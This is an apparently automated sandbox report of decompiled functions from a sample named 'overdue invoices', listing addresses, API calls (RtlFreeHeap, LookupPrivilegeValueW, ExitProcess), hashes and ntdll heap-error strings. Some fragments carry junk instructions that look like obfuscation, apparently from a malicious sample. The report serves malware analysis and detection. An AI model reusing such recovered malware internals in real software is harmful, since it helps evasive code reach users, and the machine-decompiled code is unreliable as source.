                  Function 004188E3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 346 4188e3-418907 call 4191e0 348 41890c-418921 RtlFreeHeap 346->348
                  C-Code - Quality: 43%
                  			E004188E3(void* __edx, void* __esi, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _v1;
				char _t11;
				void* _t18;
				void* _t20;

				_t20 = __esi + 1;
				asm("aam 0x5a");
				asm("stosb");
				asm("adc byte [eax-0x2f], 0xc3");
				_push( &_v1);
				_t8 = _a4;
				_push(_t20);
				_t4 = _t8 + 0xc74; // 0xc74
				E004191E0(_t18, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t11 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t11;
			}







                  0x004188e3
                  0x004188e5
                  0x004188e7
                  0x004188e8
                  0x004188f0
                  0x004188f3
                  0x004188f9
                  0x004188ff
                  0x00418907
                  0x0041891d
                  0x00418921

                  APIs
                  • RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 0041891D
                  Memory Dump Source
                  • Source File: 00000001.00000002.442760136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_overdue invoices.jbxd
                  Yara matches
                  Similarity
                  • API ID: FreeHeap
                  • String ID:
                  • API String ID: 3298025750-0
                  • Opcode ID: 0f0dcf56324a82428ddda3b705434dcb5d55d9913cf1d8c86b87696274da9821
                  • Instruction ID: 1526e3f82e60cb0f0f7513570dbee8eb661b25c0dd350d0b304ee410f77666de
                  • Opcode Fuzzy Hash: 0f0dcf56324a82428ddda3b705434dcb5d55d9913cf1d8c86b87696274da9821
                  • Instruction Fuzzy Hash: D5E0E571200215AFD714CF64DC49FD77B68DF88350F004689FD4897241C531E901CBA0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004188F0 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E004188F0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E004191E0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                  0x004188ff
                  0x00418907
                  0x0041891d
                  0x00418921

                  APIs
                  • RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 0041891D
                  Memory Dump Source
                  • Source File: 00000001.00000002.442760136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_overdue invoices.jbxd
                  Yara matches
                  Similarity
                  • API ID: FreeHeap
                  • String ID:
                  • API String ID: 3298025750-0
                  • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                  • Instruction ID: 4eb6e808868848e44fc4af0a2d328e43ee2ba6839a30e24a5e1d9ea2c08b961d
                  • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                  • Instruction Fuzzy Hash: 6BE012B1200209ABDB18EF99CC49EA777ACAF88750F018559FA085B242CA30E910CAB0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00418A50 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00418A50(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E004191E0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                  0x00418a6a
                  0x00418a80
                  0x00418a84

                  APIs
                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFC2,0040CFC2,00000041,00000000,?,00408B85), ref: 00418A80
                  Memory Dump Source
                  • Source File: 00000001.00000002.442760136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_overdue invoices.jbxd
                  Yara matches
                  Similarity
                  • API ID: LookupPrivilegeValue
                  • String ID:
                  • API String ID: 3899507212-0
                  • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                  • Instruction ID: 6b795ac81b365ad13cf9f2a9b204a9737006b755962b409e964d21a2d06fa60d
                  • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                  • Instruction Fuzzy Hash: 62E01AB12002086BDB10DF49CC85EE737ADAF88650F018155FA0857241C934E950CBF5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00418922 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                  Download Yara Rule
                  C-Code - Quality: 21%
                  			E00418922(intOrPtr _a4, int _a8) {
				void* _t11;

				_pop(es);
				asm("fldcw word [edi-0x49]");
				_push(0x2f245eb3);
				asm("out dx, eax");
				asm("out 0x55, al");
				_t6 = _a4;
				E004191E0(_t11, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t6 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                  0x00418922
                  0x00418923
                  0x00418926
                  0x0041892c
                  0x0041892f
                  0x00418933
                  0x0041894a
                  0x00418958

                  APIs
                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418958
                  Memory Dump Source
                  • Source File: 00000001.00000002.442760136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_overdue invoices.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitProcess
                  • String ID:
                  • API String ID: 621844428-0
                  • Opcode ID: eb4d5f7531cdb9ad5b17ab91f8c1baa553a30f73705cb507f28313c7eee5f72b
                  • Instruction ID: 8e262669190bf93c89f35a012981b9a4b7bea061a0affcce614886fe3681cc5b
                  • Opcode Fuzzy Hash: eb4d5f7531cdb9ad5b17ab91f8c1baa553a30f73705cb507f28313c7eee5f72b
                  • Instruction Fuzzy Hash: 89E086317052157FE710EF59CC85FC737989F09790F014054FA5957242D574AB00C7E4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00418930 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00418930(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E004191E0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                  0x00418933
                  0x0041894a
                  0x00418958

                  APIs
                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418958
                  Memory Dump Source
                  • Source File: 00000001.00000002.442760136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_overdue invoices.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitProcess
                  • String ID:
                  • API String ID: 621844428-0
                  • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                  • Instruction ID: c6ffa8f41277cedcd146721b33de4ab2dd662f0a832426917f21051448e796de
                  • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                  • Instruction Fuzzy Hash: 90D012716042147BD620DB99CC85FD7779CDF48790F018065FA1C5B241C531BA00C6E1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009D967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 53662d24fe664d3bec27704840f744e0213dfc77c9050733dbe3b2bd756b4cb7
                  • Instruction ID: 2892d63dd41b5f58d73e56a562f917afef8fa8b4147951bd02fc0c65b4133e61
                  • Opcode Fuzzy Hash: 53662d24fe664d3bec27704840f744e0213dfc77c9050733dbe3b2bd756b4cb7
                  • Instruction Fuzzy Hash: 51B09B719425C5C5D711E77146087277A4477D0745F66C062D1420655A4778C891F6B5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Non-executed Functions

                  Function 00A4B260 Relevance: 37.8, Strings: 30, Instructions: 262COMMON
                  Download Yara Rule
                  Strings
                  • *** Resource timeout (%p) in %ws:%s, xrefs: 00A4B352
                  • a NULL pointer, xrefs: 00A4B4E0
                  • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 00A4B314
                  • *** enter .cxr %p for the context, xrefs: 00A4B50D
                  • The instruction at %p referenced memory at %p., xrefs: 00A4B432
                  • The resource is owned shared by %d threads, xrefs: 00A4B37E
                  • The instruction at %p tried to %s , xrefs: 00A4B4B6
                  • *** An Access Violation occurred in %ws:%s, xrefs: 00A4B48F
                  • *** then kb to get the faulting stack, xrefs: 00A4B51C
                  • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 00A4B47D
                  • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 00A4B323
                  • *** enter .exr %p for the exception record, xrefs: 00A4B4F1
                  • The critical section is owned by thread %p., xrefs: 00A4B3B9
                  • *** A stack buffer overrun occurred in %ws:%s, xrefs: 00A4B2F3
                  • The resource is owned exclusively by thread %p, xrefs: 00A4B374
                  • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 00A4B476
                  • This failed because of error %Ix., xrefs: 00A4B446
                  • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 00A4B2DC
                  • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 00A4B3D6
                  • write to, xrefs: 00A4B4A6
                  • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 00A4B53F
                  • Go determine why that thread has not released the critical section., xrefs: 00A4B3C5
                  • read from, xrefs: 00A4B4AD, 00A4B4B2
                  • <unknown>, xrefs: 00A4B27E, 00A4B2D1, 00A4B350, 00A4B399, 00A4B417, 00A4B48E
                  • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 00A4B38F
                  • an invalid address, %p, xrefs: 00A4B4CF
                  • *** Inpage error in %ws:%s, xrefs: 00A4B418
                  • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 00A4B305
                  • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 00A4B39B
                  • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 00A4B484
                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                  • API String ID: 0-108210295
                  • Opcode ID: d62bfc403ec1c752cf555c21c6e877c715e77f1e44bb40c2900a367e042ba5b3
                  • Instruction ID: 2a34fe5dc2640ed81a498b1673d081bb4193028609760991365c9f17e2726045
                  • Opcode Fuzzy Hash: d62bfc403ec1c752cf555c21c6e877c715e77f1e44bb40c2900a367e042ba5b3
                  • Instruction Fuzzy Hash: 8B81FE79A51220BFCB21AF199C4AE7B3B36AFC6B65F004054F1046B693D371D801EBB2
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00A51C06 Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                  Download Yara Rule
                  C-Code - Quality: 44%
                  			E00A51C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x9748a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0099B150();
				} else {
					E0099B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0xa8589c);
				E0099B150("Heap error detected at %p (heap handle %p)\n",  *0xa858a0);
				_t27 =  *0xa85898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M00A51E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0099B150();
				} else {
					E0099B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E0099B150("Error code: %d - %s\n",  *0xa85898);
				_t113 =  *0xa858a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0099B150();
					} else {
						E0099B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0099B150("Parameter1: %p\n",  *0xa858a4);
				}
				_t115 =  *0xa858a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0099B150();
					} else {
						E0099B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0099B150("Parameter2: %p\n",  *0xa858a8);
				}
				_t117 =  *0xa858ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0099B150();
					} else {
						E0099B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0099B150("Parameter3: %p\n",  *0xa858ac);
				}
				_t119 =  *0xa858b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0099B150();
					} else {
						E0099B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0xa858b4);
					E0099B150("Last known valid blocks: before - %p, after - %p\n",  *0xa858b0);
				} else {
					_t120 =  *0xa858b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0099B150();
				} else {
					E0099B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E0099B150("Stack trace available at %p\n", 0xa858c0);
			}











                  0x00a51c10
                  0x00a51c16
                  0x00a51c1e
                  0x00a51c3d
                  0x00a51c3e
                  0x00a51c20
                  0x00a51c35
                  0x00a51c3a
                  0x00a51c44
                  0x00a51c55
                  0x00a51c5a
                  0x00a51c65
                  0x00a51c67
                  0x00000000
                  0x00a51c6e
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00a51c67
                  0x00a51cdc
                  0x00a51ce5
                  0x00a51d04
                  0x00a51d05
                  0x00a51ce7
                  0x00a51cfc
                  0x00a51d01
                  0x00a51d0b
                  0x00a51d17
                  0x00a51d1f
                  0x00a51d25
                  0x00a51d30
                  0x00a51d4f
                  0x00a51d50
                  0x00a51d32
                  0x00a51d47
                  0x00a51d4c
                  0x00a51d61
                  0x00a51d67
                  0x00a51d68
                  0x00a51d6e
                  0x00a51d79
                  0x00a51d98
                  0x00a51d99
                  0x00a51d7b
                  0x00a51d90
                  0x00a51d95
                  0x00a51daa
                  0x00a51db0
                  0x00a51db1
                  0x00a51db7
                  0x00a51dc2
                  0x00a51de1
                  0x00a51de2
                  0x00a51dc4
                  0x00a51dd9
                  0x00a51dde
                  0x00a51df3
                  0x00a51df9
                  0x00a51dfa
                  0x00a51e00
                  0x00a51e0a
                  0x00a51e13
                  0x00a51e32
                  0x00a51e33
                  0x00a51e15
                  0x00a51e2a
                  0x00a51e2f
                  0x00a51e39
                  0x00a51e4a
                  0x00a51e02
                  0x00a51e02
                  0x00a51e08
                  0x00000000
                  0x00000000
                  0x00a51e08
                  0x00a51e5b
                  0x00a51e7a
                  0x00a51e7b
                  0x00a51e5d
                  0x00a51e72
                  0x00a51e77
                  0x00a51e95

                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                  • API String ID: 0-2897834094
                  • Opcode ID: d2b8c267c39f0d7938f77a83e002fdc1dd03dc7be90b3cbe77077ebfb8c09842
                  • Instruction ID: 964385c9dfd4b7d7ffdd887fac355172657f6f86f8e26a95f589138cc44b7f71
                  • Opcode Fuzzy Hash: d2b8c267c39f0d7938f77a83e002fdc1dd03dc7be90b3cbe77077ebfb8c09842
                  • Instruction Fuzzy Hash: BE61E533954644DFC721AB98E9A6F3073F4FB40B22B19843AFC0D6B361D6789C459B0A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009A3D34 Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                  Download Yara Rule
                  C-Code - Quality: 96%
                  			E009A3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E009A1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E009A1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E009A1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E009A1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E009A1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L009B4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E009DF3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E009E1370(_t276, 0x974e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E009DBB40(0,  &_v68, _t170);
									if(L009A43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E009DBB40(_t257,  &_v68, _t243);
								if(L009A43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E009E1370(_t278, 0x974e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L009B4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E009DF3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E009E1370(_v16, 0x974e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E009DBB40(_t262,  &_v68, _t244);
								if(L009A43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E009E1370(_t282, 0x974e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E009DBB40(_t262,  &_v68, _t201);
							if(L009A43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L009B4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E009DF3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E009E1370(_t280, 0x974e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E009DBB40(_t267,  &_v68, _t245);
							if(L009A43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E009E1370(_t284, 0x974e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E009DBB40(_t267,  &_v68, _t224);
						if(L009A43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                  0x009a3d3c
                  0x009a3d42
                  0x009a3d44
                  0x009a3d46
                  0x009a3d49
                  0x009a3d4c
                  0x009a3d4f
                  0x009a3d52
                  0x009a3d55
                  0x009a3d58
                  0x009a3d5b
                  0x009a3d5f
                  0x009a3d61
                  0x009a3d66
                  0x009f8213
                  0x009f8218
                  0x009a4085
                  0x009a4088
                  0x009a408e
                  0x009a4094
                  0x009a409a
                  0x009a40a0
                  0x009a40a6
                  0x009a40a9
                  0x009a40af
                  0x009a40b6
                  0x009a40bd
                  0x009a40bd
                  0x009a3d83
                  0x009f821f
                  0x009f8229
                  0x009f8238
                  0x009f8238
                  0x009f823d
                  0x009f823d
                  0x009a3da0
                  0x009a3daf
                  0x009a3db5
                  0x009a3dba
                  0x009a3dba
                  0x009a3dd4
                  0x009a3e94
                  0x009a3eab
                  0x009a3f6d
                  0x009a3f84
                  0x009a406b
                  0x009a406b
                  0x009a406e
                  0x009a406e
                  0x009a4070
                  0x009a4074
                  0x009f8351
                  0x009f8351
                  0x009a407a
                  0x009a407f
                  0x009f835d
                  0x009f8370
                  0x009f8377
                  0x009f8379
                  0x009f837c
                  0x009f837c
                  0x009f835d
                  0x00000000
                  0x009a407f
                  0x009a3f8a
                  0x009a3f8d
                  0x009a3f90
                  0x009a3f95
                  0x009f830d
                  0x009f830f
                  0x009a3f9b
                  0x009a3fac
                  0x009a3fae
                  0x009a3fb1
                  0x009a3fb1
